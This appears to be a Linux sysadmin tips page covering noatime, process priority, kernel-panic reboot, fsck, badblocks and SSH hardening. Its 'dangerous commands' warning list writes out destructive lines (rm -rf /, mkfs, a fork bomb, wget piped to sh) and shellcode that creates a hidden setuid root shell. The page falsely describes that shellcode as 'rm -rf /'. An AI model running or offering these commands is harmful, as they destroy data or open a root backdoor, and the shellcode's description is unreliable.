October 2025
Improving filesystem read performance using “noatime”

Linux records information about when each file was last accessed, and there is a cost associated with recording that access time. The ext3 filesystem allows the super-user to mark individual filesystems so that recording of last access times is skipped. This can lead to significant performance improvements for frequently accessed, frequently changing files, such as the contents of a web server directory.

The only drawback is that the files’ atime (access time) will no longer be updated.

Linux has a special mount option for file systems called “noatime” that can be added to each line that addresses one file system in the /etc/fstab file. If a file system has been mounted with this option, reading accesses to the file system will no longer result in an update to the atime (access time) information associated with the file.

The importance of the noatime setting is that it eliminates the need for the system to make writes to the file system for files which are simply being read. Since writes can be somewhat expensive, this can result in measurable performance gains.

Note that a file’s write time information will continue to be updated any time the file is written to.

Edit the fstab file (vi /etc/fstab) and add the “noatime” option to the line for the filesystem you are interested in, as shown below:

/dev/sda1          /var/www          ext3          defaults,noatime          1  2
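If you’d rather not reboot for the fstab change to take effect, you can remount the filesystem in place and then confirm the active options. A minimal sketch, using this article’s /var/www example mount point:

```shell
# Remount with noatime without unmounting (requires root):
#   mount -o remount,noatime /var/www
# The kernel's view of active mount options lives in /proc/mounts;
# check which filesystems (if any) are currently mounted noatime:
grep -w noatime /proc/mounts || echo "no filesystems mounted noatime"
```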

Process priority with nice

Modern operating systems are multi-user and multitasking, which means that multiple users and multiple tasks can be using the computer at any given time. Typically you’ll have one person using a desktop system running any number of applications or many users using many applications on a server.

The amount of time devoted to tasks largely depends on how intensive the task is. Some tasks require higher priority than others; for instance, if you were compiling a large software package you didn’t need immediately, that priority should probably be lower than your Web browser or e-mail client.

Each process has a niceness value associated with it, which is what the kernel uses to determine which processes require more processor time than others. The higher the nice value, the lower the priority of the process. In other words, the “nicer” the program, the less CPU it will try to take from other processes; programs that are less nice tend to demand more CPU time than other programs that are nicer.

The priority is noted by a range of -20 (the highest) to 19 (the lowest). Using ps, you can see the current nice value of all programs:

$ ps axl
F   UID   PID  PPID PRI  NI    VSZ   RSS WCHAN  STAT TTY        TIME COMMAND
4     0     1     0  16   0   2648   112 -      S    ?          0:01 init [3]
1     0     2     1  34  19      0     0 ksofti SN   ?          0:02 [ksoftirqd/0]
5     0     3     1  10  -5      0     0 worker S<   ?          0:00 [events/0]
...

You can see that init has a nice value of 0, while the kernel tasks with PIDs 2 and 3 have nice values of 19 and -5, respectively.

Typically, a program inherits its nice value from its parent; this prevents low priority processes from spawning high priority children. Having said that, you can use the nice command (as root or via sudo) with the command you wish to execute in order to alter its nice value. Here is a short illustration:

# ps axl | grep axl | grep -v grep
4     0 30819 30623  15   0   4660   772 -      R+   pts/0      0:00 ps axl
# nice -10 ps axl | grep axl | grep -v grep
4     0 30822 30623  30  10   4660   772 -      RN+  pts/0      0:00 ps axl

You can see there that the nice value, represented by column six, has been altered. You can also use the renice command to alter running processes. In the following example, vim was started to edit the file foo and began with a default nice value of 0. Using renice, we can change its priority:

# ps axl | grep vim | grep -v grep
0     0 30832 30623  16   0  15840  3140 -      S+   pts/0      0:00 vim foo
# renice -5 30832
30832: old priority 0, new priority -5
# ps axl | grep vim | grep -v grep
0     0 30832 30623  15  -5  15840  3140 -      S<+  pts/0      0:00 vim foo

Here, we have adjusted the priority of vim, giving it a slightly higher priority. Renice operates on the process ID, so using grep, we determined that vim is process ID 30832 and saw that the nice value was 0. After executing renice, the nice value is now -5.

Standard caveats apply: only root can raise a process’s priority (give it a lower nice value); regular users may only make their own processes nicer. So if you find that your compilation is taking too much CPU from other activities, consider renicing the parent process via root. Subsequent children will inherit the new nice value, or you can start the compilation (or any other activity) with nice, specifying an appropriate nice value. You can also use renice on all programs belonging to a process group or user name/ID.

If you wish to run a command which typically uses a lot of CPU (for example, running tar on a large file), then you probably don’t want to bog down your whole system with it. Linux systems provide the nice command to control your process priority at launch, or renice to change the priority of an already running process. The full manpage has help, but the command is very easy to use:

$ nice -n prioritylevel /command/to/run

The priority level runs from -20 (top priority) to 19 (lowest). For example, to run tar and gzip at the lowest priority level:

$ nice -n 19 tar -czvf file.tar.gz bigfiletocompress
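A quick, harmless way to see the mechanism at work: nice run with no arguments prints the current niceness, so nesting it under nice -n shows the value actually being applied:

```shell
# 'nice' with no command prints the invoking shell's niceness;
# under 'nice -n 10' the child inherits a niceness raised by 10.
nice            # typically prints 0
nice -n 10 nice # prints 10
```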

Similarly, if you have a process already running, use ps to find its process ID, and then use renice to change its priority level:

$ renice -n 19 -p <PID>
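For a self-contained illustration, here is a sketch using a throwaway sleep process; note that an unprivileged user can only raise a process’s niceness, never lower it:

```shell
# Start a background job, renice it, and confirm the new value.
sleep 30 &
pid=$!
renice -n 5 -p "$pid" >/dev/null
ps -o ni= -p "$pid"    # prints the new niceness: 5
kill "$pid"
```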

Auto reboot after kernel panic

When the kernel encounters an unrecoverable error, it calls the “panic” function. On systems with LKCD (Linux Kernel Crash Dump) configured, the panic initiates a kernel dump in which kernel memory is copied out to a pre-designated dump area; the dump device is configured as primary swap by default. The kernel is not completely functional at this point, but there is enough functionality left to copy memory to disk. When the system boots back up, it checks for a new crash dump. If one is found, it is copied from the dump location to the filesystem, the “/var/log/dump” directory by default. After copying the image, the system continues to boot normally and forensics can be performed at a later date.

By default, after a kernel panic the system just sits there waiting for a restart. This is because of the value of the “kernel.panic” parameter.

# cat /proc/sys/kernel/panic
0

To change this and make the Linux OS reboot after a kernel panic, we have to set the parameter “kernel.panic” to an integer value greater than zero, where the value is the number of seconds to wait before an automatic reboot. For example, if you set it to “10”, the system waits 10 seconds before automatically rebooting. To make this permanent, edit /etc/sysctl.conf and add the following line at the end of the file.

kernel.panic = 10
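To apply the value on the running system without a reboot, sysctl -w (or a direct write to /proc) works alongside the /etc/sysctl.conf entry:

```shell
# Set the value at runtime (requires root):
#   sysctl -w kernel.panic=10
# Reading the current value back needs no privileges:
cat /proc/sys/kernel/panic
```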

Linux is a robust and stable operating system kernel, but there are instances where it can panic, be it due to bad hardware or bad software. It does not happen often, but it can happen.

If you’re running a server or some other always-on system that you may not have easy access to, a kernel panic typically means an inconvenient trip to reboot a system or a phone call to inconvenience someone else. You can, however, configure Linux to automatically reboot on a kernel panic by making a small modification to /etc/sysctl.conf, a configuration file that tweaks many kernel operating parameters.

Add the following to /etc/sysctl.conf:

kernel.panic = 20

This tells the kernel that if it encounters a panic, it is to reboot the system after a 20 second delay. By default, the kernel will never reboot when it encounters a panic, but with the above setting you can force it to.

Of course, if you enable this, make sure you are using swatch or some other means of observing log files, so that you are aware when the system panics and can take appropriate steps to correct the problem.

On local systems, it is also convenient to be able to reboot the system with a key-press in the case of a panic. Instead of having the system reboot automatically on a local system, consider using the magic SysRq keys to reboot your system if X locks up or keyboard entry is being ignored.

To enable magic SysRq support, you must again edit /etc/sysctl.conf; some Linux distributions have this enabled by default whereas others do not.

kernel.sysrq = 1

If the time comes when the SysRq keys are required, use the magic SysRq combination, which is: [ALT]+[SysRq]+[COMMAND], where the [SysRq] key is the “print screen” key and [COMMAND] is one of the following:

  • b – reboot immediately without syncing or unmounting disks
  • e – sends a SIGTERM to all running processes, except for init
  • o – shut down system
  • s – attempt to sync all mounted filesystems
  • u – attempt to remount all mounted filesystems as read-only

These keys need to be pressed simultaneously to take effect.

Auto-rebooting is great for remote systems, and the magic SysRq combo is very useful for local systems.
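The same actions are also reachable without the keyboard: writing a command letter to /proc/sysrq-trigger (as root) invokes it directly, which is handy over a still-responsive SSH session. For example, the classic sync/remount/reboot sequence:

```shell
# Each write invokes the corresponding SysRq action (requires root):
#   echo s > /proc/sysrq-trigger   # sync all mounted filesystems
#   echo u > /proc/sysrq-trigger   # remount filesystems read-only
#   echo b > /proc/sysrq-trigger   # reboot immediately
# Reading the current SysRq setting needs no privileges:
cat /proc/sys/kernel/sysrq
```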

 

By default, after a kernel panic the Linux kernel just sits there waiting for a system administrator to hit the restart or power-cycle button. This is because of the value of the “kernel.panic” parameter.

[root@linux23 ~]# cat /proc/sys/kernel/panic
0
[root@linux23 ~]# sysctl -a | grep kernel.panic
kernel.panic = 0
[root@linux23 ~]#

To change this and make the Linux OS reboot after a kernel panic, we have to set the parameter “kernel.panic” to an integer N greater than zero, where N is the number of seconds to wait before an automatic reboot.

For example, if you set N = 10, the system waits 10 seconds before automatically rebooting. To make this permanent, edit /etc/sysctl.conf and set it there.

[root@linux23 ~]# echo "10" > /proc/sys/kernel/panic
[root@linux23 ~]# grep kernel.panic /etc/sysctl.conf
kernel.panic = 10
[root@linux23 ~]#

Limit the CPU usage of an application (process) – cpulimit

cpulimit is a simple program that attempts to limit the cpu usage of a process (expressed in percentage, not in cpu time). This is useful to control batch jobs, when you don’t want them to eat too much cpu. It does not act on the nice value or other scheduling priority stuff, but on the real cpu usage. Also, it is able to adapt itself to the overall system load, dynamically and quickly.

Installation:
Download the latest stable version of cpulimit, then extract the source and compile with make:

tar zxf cpulimit-xxx.tar.gz
cd cpulimit-xxx
make

The resulting executable is named cpulimit. You may want to copy it to /usr/bin.

Usage:
Limit the process ‘bigloop’ by executable name to 40% CPU:

cpulimit --exe bigloop --limit 40
cpulimit --exe /usr/local/bin/bigloop --limit 40

Limit a process by PID to 55% CPU:

cpulimit --pid 2960 --limit 55

cpulimit should be run by at least the same user that runs the controlled process, but it is much better to run cpulimit as root, in order to have a higher priority and more precise control.

How to check/repair (fsck) filesystem after crash or power-outage

At some point your system will crash and you need to perform a manual repair of your file system. A typical situation would be power loss while you are working on the system. You reboot and the system stops and indicates you must perform a manual repair of the system using fsck.

fsck (file system consistency check) is a command used to check Linux filesystems for consistency errors and repair them. This tool is important for maintaining data integrity, so it should be run regularly, and especially after an unforeseen reboot (crash, power outage).

Usage: fsck [-sACVRTNP] [-t fs-optlist] [filesystem] [fs-specific-options]

Filesystem can be either a device’s name (e.g. /dev/hda) or its mount point. Run with no options, fsck will check all devices listed in /etc/fstab. It might be necessary to run fsck from single-user mode.

Note: You need to be “root” to use any of the commands mentioned below.

* Take system down to runlevel one: # init 1

* Unmount file system, for example if it is /home (/dev/sda2) file system then type command:
# umount /home OR  # umount /dev/sda2

* Now run fsck on the partition: # fsck /dev/sda2

* Specify the file system type using -t option: # fsck -t ext3 /dev/sda2 OR  # fsck.ext3 /dev/sda2

fsck will check the file system and ask which problems should be fixed or corrected. If you don’t want to type y every time, you can pass the -y option to fsck: # fsck -y /dev/sda2

Please note that if any files are recovered, fsck places them in the lost+found directory at the top of that filesystem (here, /home/lost+found).

* Once fsck finished, remount the file system: # mount /home
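If you want to practice before an emergency, fsck can be pointed at a filesystem image in an ordinary file, so there is nothing to unmount and no real disk at risk. A sketch, assuming e2fsprogs is installed; -n keeps the check read-only:

```shell
# Build a small ext3 filesystem inside a regular file...
dd if=/dev/zero of=/tmp/fsck-demo.img bs=1M count=8 2>/dev/null
mkfs.ext3 -q -F /tmp/fsck-demo.img
# ...and check it. -n answers "no" to every repair prompt.
fsck -n /tmp/fsck-demo.img
rm -f /tmp/fsck-demo.img
```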

Get Hostname from IP address

To get the hostname from an IP address, the simplest way is to use the “host” utility provided by GNU/Linux. Just run:

testserver:~ # host 64.233.187.99
99.187.233.64.in-addr.arpa domain name pointer jc-in-f99.google.com.
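If the host utility is not installed, getent performs the same lookup through NSS, which also consults /etc/hosts, so it even works offline for local entries:

```shell
# Reverse-resolve an address via NSS (DNS plus /etc/hosts):
getent hosts 127.0.0.1
```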

Howto check disk drive for errors and badblocks

badblocks is a Linux utility to check for bad sectors on a disk drive (A bad sector is a sector on a computer’s disk drive or flash memory that cannot be used due to permanent damage or an OS inability to successfully access it.). It creates a list of these sectors that can be used with other programs, like mkfs, so that they are not used in the future and thus do not cause corruption of data. It is part of the e2fsprogs project.

It can be a good idea to periodically check for bad blocks. This is done with the badblocks command. It outputs a list of the numbers of all bad blocks it can find. This list can be fed to fsck to be recorded in the filesystem data structures so that the operating system won’t try to use the bad blocks for storing data. The following example will show how this could be done.

From the terminal, type following command:

$ sudo badblocks -v /dev/hda1 > bad-blocks

The above command will generate the file bad-blocks in the current directory from where you are running this command.

Now, you can pass this file to the fsck command to record these bad blocks

$ sudo fsck -t ext3 -l bad-blocks /dev/hda1
Pass 1: Checking inodes, blocks, and sizes
Pass 2: Checking directory structure
Pass 3: Checking directory connectivity
Pass 4: Check reference counts.
Pass 5: Checking group summary information.

/dev/hda1: ***** FILE SYSTEM WAS MODIFIED *****

/dev/hda1: 11/360 files, 63/1440 blocks

If badblocks reports a block that was already used, e2fsck will try to move the block to another place. If the block was really bad, not just marginal, the contents of the file may be corrupted.

Look at the badblocks man page for more command-line options.

Linux Commands to Monitor Memory Usage

  • vmstat – monitor virtual memory
  • free – display the amount of free and used memory in the system
  • pmap – display/examine the memory map and libraries (.so) of a process; usage: pmap pid
  • top – show top processes
  • sar -B – show statistics on page swapping
  • /usr/bin/time -v date – show system page size, page faults, etc. of a process during execution; note you must fully qualify the command as “/usr/bin/time” to avoid the bash built-in “time”
  • cat /proc/sys/vm/freepages – display virtual memory “free pages”; one may increase/decrease this limit: echo 300 400 500 > /proc/sys/vm/freepages
  • cat /proc/meminfo – show memory size and usage
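Most of these tools ultimately read /proc/meminfo, so you can pull the headline numbers out directly with awk:

```shell
# Print total and free memory straight from the kernel's counters:
awk '/^MemTotal:|^MemFree:/ {print $1, $2, $3}' /proc/meminfo
```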

The 7 most dangerous commands of GNU/Linux

1. rm -rf /

This powerful command recursively deletes every file under the root directory “/”.

2. Code:

char esp[] __attribute__ ((section(".text"))) /* e.s.p release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;";

This is the hex version of [rm -rf /], which can deceive even experienced GNU/Linux users.

3. mkfs.ext3 /dev/sda

This will create a new filesystem on the device mentioned after the mkfs command, destroying all data on it.

4. :(){ :|:& };:

Known as a fork bomb, this command spawns processes endlessly until the system freezes. This can lead to data corruption.

5. any_command > /dev/sda

This command causes total loss of data on the device mentioned in the command.

6. wget http://some_untrusted_source -O - | sh

Never download and execute scripts from untrusted sources; they may contain malicious code.

7. mv /home/yourhomedirectory/* /dev/null

This command will move all the files in your home directory to a place that does not exist; you will never see your files again.

If you got any other dangerous command, please let me know, I will include it over here.

[Ref: http://www.linuxpromagazine.com/online/news/seven_deadliest_linux_commands?category=13447]

Securing SSH

SSH is how most administrators connect to their servers. It is also one of the most commonly attacked ports on a Linux server. If you followed my previous tutorial about how to install fail2ban, you’ve probably noticed that you receive many emails about failed attacks. In this tutorial, I’ll show a few more steps that can be taken to lock down the SSH daemon and your server even further.
Before we begin, I’d like to show you a few stats about your server. The following commands will show you some interesting information about the brute force attacks you’ve been noticing on your server.

First – Show the 5 most recently attacked user accounts on your system. In this list you may notice user accounts that don’t even exist on your system. That is because someone is trying automated attacks against you:

lastb | awk '{print $1}' | sort | uniq -c | sort -rn | head -5

Next – Show the 5 most attacked accounts. Again, user accounts that don’t exist may be in this list.

awk 'gsub(".*sshd.*Failed password for (invalid user )?", "") {print $1}' /var/log/secure* | sort | uniq -c | sort -rn | head -5

Finally – Show the 5 most frequent attacker IP addresses. These are addresses that attempt to connect to your server.

awk 'gsub(".*sshd.*Failed password for (invalid user )?", "") {print $3}' /var/log/secure* | sort | uniq -c | sort -rn | head -5

Securing SSH

Now that you can see what’s coming at your server, what can you do about it? Below are a few steps you can take to secure SSH.

vi /etc/ssh/sshd_config

This is the main configuration file for SSH. All of our changes will be in here.

The first setting we are looking for is Protocol. We want this changed to a 2. Most modern Linux Distributions already have this by default, but some may still allow the first version of the protocol to connect. We don’t want this.

Protocol 2

Next, we are going to deny root the ability to log in via SSH. Root doesn’t need direct access, because we have already set up sudo. Find the PermitRootLogin setting and change it to no.

PermitRootLogin no

The next step is to limit the amount of time an unauthenticated session can hold open a connection. By default this is two minutes, which is way too long. Find the LoginGraceTime setting and change it to a more reasonable time. The value listed here is in seconds. The example below allows 30 seconds for a user to enter their password before the connection is closed.

LoginGraceTime 30

The next one is to change the SSH port. It should be noted that this step brings no additional security to your system at all. It will, however, reduce the number of random, automated attacks that hit your server. Again, it will NOT bring additional security to your system. Find the Port setting and change it to another port. Common practice is to raise this above 1024, as everything below that is reserved for other programs.

Port 22222

Now when you connect to your server, you will need to modify your connection port to use 22222.

Next, we can set up SSH to only allow whitelisted users or groups. The following will only allow the users ‘mary’, ‘john’ and any user whose name starts with ‘joe’ to connect. This line gets placed at the end of the file:

AllowUsers john mary joe*

This setting, alternatively, will allow all users from the ‘sshusers’ group to log in:

AllowGroups sshusers

Finally, we can only allow users to log in using public/private key pairs. How to set this up is beyond the scope of this tutorial, so if you don’t know how to do so, do not change this setting:

PasswordAuthentication no

Save and exit this file. Now we restart sshd and you are good to go.

Note: Do not log out of your active SSH session after running this command until you have tested that you can connect. If you do and something does not work, you will be locked out of your server.

service sshd restart
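A safety net worth knowing, assuming OpenSSH’s sshd binary is on your path: sshd -t validates the configuration file and exits non-zero on a syntax error, so chaining it before the restart prevents a bad edit from taking the daemon down:

```shell
# Only restart if the configuration parses cleanly (requires root).
# sshd -t prints nothing and exits 0 when sshd_config is valid.
sshd -t && service sshd restart
```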

If you are able to log in using another PuTTY or SSH session, your changes have worked. Remember, if you changed the port, you need to specify the new port when you log in.